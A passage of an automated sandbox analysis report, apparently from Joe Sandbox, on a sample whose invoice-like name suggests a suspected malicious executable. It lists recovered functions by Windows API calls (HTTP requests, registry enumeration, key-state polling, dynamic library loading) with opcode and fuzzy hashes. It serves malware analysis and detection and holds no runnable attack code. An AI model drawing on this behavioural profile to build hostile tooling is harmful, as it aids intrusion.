                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: BuffCharLower_memmove
                                          • String ID: cdecl$none$stdcall$winapi
                                          • API String ID: 3425801089-567219261
                                          • Opcode ID: 85bf6583a6d5216460642c634f58536033cb8f756531c513cb924ba6ba7dc0f0
                                          • Instruction ID: 0be9701992b4b91cd2e68042300235638f00ad80fed84879f118ea648425d64e
                                          • Opcode Fuzzy Hash: 85bf6583a6d5216460642c634f58536033cb8f756531c513cb924ba6ba7dc0f0
                                          • Instruction Fuzzy Hash: 783191719142159BCF00EF55CC919EEB3B4FF14324B108A2BE839A76D2DB39AD05CB95
                                          APIs
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                            • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57
                                            • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$_memmove$ClassName
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 365058703-1403004172
                                          • Opcode ID: 5616a381d2a6c22893b6373ffe679699cd493d48246bdb2e94df39414b209154
                                          • Instruction ID: 808fcc3072a567dbeea6ba3b2dea5d83030b8b2133ef71414da725dc7de09f99
                                          • Opcode Fuzzy Hash: 5616a381d2a6c22893b6373ffe679699cd493d48246bdb2e94df39414b209154
                                          • Instruction Fuzzy Hash: 1021F572A00108BEDB14ABA19C45DFF7769DF05324B10462FF825B72E2DE3D180E9A28
                                          APIs
                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0047184C
                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00471872
                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004718A2
                                          • InternetCloseHandle.WININET(00000000), ref: 004718E9
                                            • Part of subcall function 00472483: GetLastError.KERNEL32(?,?,00471817,00000000,00000000,00000001), ref: 00472498
                                            • Part of subcall function 00472483: SetEvent.KERNEL32(?,?,00471817,00000000,00000000,00000001), ref: 004724AD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                          • String ID:
                                          • API String ID: 3113390036-3916222277
                                          • Opcode ID: 6e03d3876d11c1f4078e21f2429e25c28f700f0be32576d9d2588f00842c0ae0
                                          • Instruction ID: 9f195ba99928d8c49214c982579914efbee4b11eb605a7749f470a37591c6317
                                          • Opcode Fuzzy Hash: 6e03d3876d11c1f4078e21f2429e25c28f700f0be32576d9d2588f00842c0ae0
                                          • Instruction Fuzzy Hash: 1021B3B15002087FE711AF65DC85EFF77EDEB48748F10812FF44992250DA688D0957AA
                                          APIs
                                            • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                            • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                            • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
                                          • LoadLibraryW.KERNEL32(?), ref: 00486468
                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0048647D
                                          • DestroyWindow.USER32(?), ref: 00486485
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                          • String ID: SysAnimate32
                                          • API String ID: 4146253029-1011021900
                                          • Opcode ID: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                          • Instruction ID: 96a79e02294e314170444e54cb88eb83d8519b29eeb49143b64c907e724dd28e
                                          • Opcode Fuzzy Hash: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                          • Instruction Fuzzy Hash: 2C219571110205BFEF506F64DC40EBF37ADEF54724F114A2AF91492190D739DC41A768
                                          APIs
                                          • GetStdHandle.KERNEL32(0000000C), ref: 00466DBC
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466DEF
                                          • GetStdHandle.KERNEL32(0000000C), ref: 00466E01
                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00466E3B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CreateHandle$FilePipe
                                          • String ID: nul
                                          • API String ID: 4209266947-2873401336
                                          • Opcode ID: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                          • Instruction ID: cca2de9678abd998f0cd8c5114a45f7ff5fc269ace22cdb61a343b4aec1dc2fa
                                          • Opcode Fuzzy Hash: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                          • Instruction Fuzzy Hash: 8B219274600209ABDB209F29DC05A9A77F8EF44720F214A2FFCA0D73D0EB759955CB5A
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00466E89
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00466ECC
                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CreateHandle$FilePipe
                                          • String ID: nul
                                          • API String ID: 4209266947-2873401336
                                          • Opcode ID: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                          • Instruction ID: 3a9fffd2e99ff55030e4788a991c608e9c08d8bb738c80722c17144d2858802a
                                          • Opcode Fuzzy Hash: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                          • Instruction Fuzzy Hash: 7B21C7795003059BDB209F69CC04A9B77A8EF44724F210B1EFCA0D33D0E7759851C75A
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0046AC54
                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
                                          • __swprintf.LIBCMT ref: 0046ACC1
                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046ACFF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ErrorMode$InformationVolume__swprintf
                                          • String ID: %lu
                                          • API String ID: 3164766367-685833217
                                          • Opcode ID: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                          • Instruction ID: 026ba00fef41ead7d753cb67677e2cef5533d5e87c35db631ff5a0b10e4673a5
                                          • Opcode Fuzzy Hash: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                          • Instruction Fuzzy Hash: FE217470600109AFCB10EF65C945DAE77B8EF49318B10447EF905AB252DA35EE55CB25
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046115F
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 00461184
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046118E
                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 004611C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CounterPerformanceQuerySleep
                                          • String ID: @F
                                          • API String ID: 2875609808-2781531706
                                          • Opcode ID: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                          • Instruction ID: bb6757969e877831e55d7075b4886ee1e071d58b2ed1133263d880316bc49dff
                                          • Opcode Fuzzy Hash: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                          • Instruction Fuzzy Hash: B5113071D0051DD7CF00DFA5D9486EEBB78FF0E711F04446ADA41B2250DB789954CB9A
                                          APIs
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
                                          • CloseHandle.KERNEL32(?), ref: 0047EDEB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                          • String ID:
                                          • API String ID: 2364364464-0
                                          • Opcode ID: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                          • Instruction ID: fffec5fe55f17e3d6af6322d033c5a61601868e7b6c72126a0bd4eac84abd099
                                          • Opcode Fuzzy Hash: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                          • Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                          • String ID:
                                          • API String ID: 1559183368-0
                                          • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                          • Instruction ID: c535a9b74c3be08fb66675131960c2e3f57dfdec9721024cad96d7a05cd33cf3
                                          • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                          • Instruction Fuzzy Hash: 9051BB30B00B15EBCB149E65F84066FB7B2AF40325F94472FF825963D4D7789D918B49
                                          APIs
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                            • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048013C
                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
                                          • RegCloseKey.ADVAPI32(?,?), ref: 004801AF
                                          • RegCloseKey.ADVAPI32(00000000), ref: 004801BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                          • String ID:
                                          • API String ID: 3440857362-0
                                          • Opcode ID: 359206fcd8379e0793ee5fe764a6f8573afec8092144811008bc698b7cf463b9
                                          • Instruction ID: 88ea7daa6ea56d794f8f44f15d5cebce8ee28ea1eb3ac59e56a3faba9080710b
                                          • Opcode Fuzzy Hash: 359206fcd8379e0793ee5fe764a6f8573afec8092144811008bc698b7cf463b9
                                          • Instruction Fuzzy Hash: 00517E71214204AFC704EF54C885E6FB7E8FF84318F40492EF595972A2DB39E909CB56
                                          APIs
                                            • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                            • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                          • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0047D927
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0047D9AA
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0047D9C6
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0047DA07
                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0047DA21
                                            • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                            • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                          • String ID:
                                          • API String ID: 327935632-0
                                          • Opcode ID: 06879a4796fb006db6701dcbeb08c84373d42f215ecc0ca78cf9e4c751ad0c13
                                          • Instruction ID: 2e87ffb2dc156b6f817890f7ff3d29c7ed6bd27adfaf25e4966d104b6097512d
                                          • Opcode Fuzzy Hash: 06879a4796fb006db6701dcbeb08c84373d42f215ecc0ca78cf9e4c751ad0c13
                                          • Instruction Fuzzy Hash: C6512A75A00205DFCB00EFA9C4849AEB7B4FF09324B14C06AE959AB352D739AD45CF59
                                          APIs
                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E61F
                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E648
                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E687
                                            • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                            • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E6AC
                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E6B4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                          • String ID:
                                          • API String ID: 1389676194-0
                                          • Opcode ID: 15d6df7abba24f6c0fda673b648fc0a44ee2162c837cf8d9fdd329c326068569
                                          • Instruction ID: 91bc9b0f2d422c2787d2346e32f4aa496c052f5f6ad9ddd010e4038a96899c27
                                          • Opcode Fuzzy Hash: 15d6df7abba24f6c0fda673b648fc0a44ee2162c837cf8d9fdd329c326068569
                                          • Instruction Fuzzy Hash: 21514D75A00105DFCB01EF65C981AAEBBF5EF09314F1480AAE809AB3A2DB35ED11CF55
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                          • Instruction ID: 1d009f8157befd3e54c409f5ed609bf9f47d87f5e0fd5ad8ffda0b3aa488663e
                                          • Opcode Fuzzy Hash: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                          • Instruction Fuzzy Hash: A1419435904114ABE710FF24CC4CFAEBBA4EB09310F144A67E815A73E1C7B8AD65D75A
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 00402357
                                          • ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                          • GetAsyncKeyState.USER32(00000001), ref: 00402399
                                          • GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AsyncState$ClientCursorScreen
                                          • String ID:
                                          • API String ID: 4210589936-0
                                          • Opcode ID: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                          • Instruction ID: 839f7de4dd1eaa7d0d5dffd0863558e2d4fc2f6d206a63eef28a724dc464cb27
                                          • Opcode Fuzzy Hash: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                          • Instruction Fuzzy Hash: EB416135504115FBCF199FA9C848AEEBB74FB09364F20432BE825A22D0C7789D54DB95
                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004563E7
                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 00456433
                                          • TranslateMessage.USER32(?), ref: 0045645C
                                          • DispatchMessageW.USER32(?), ref: 00456466
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00456475
                                          Memory Dump Source
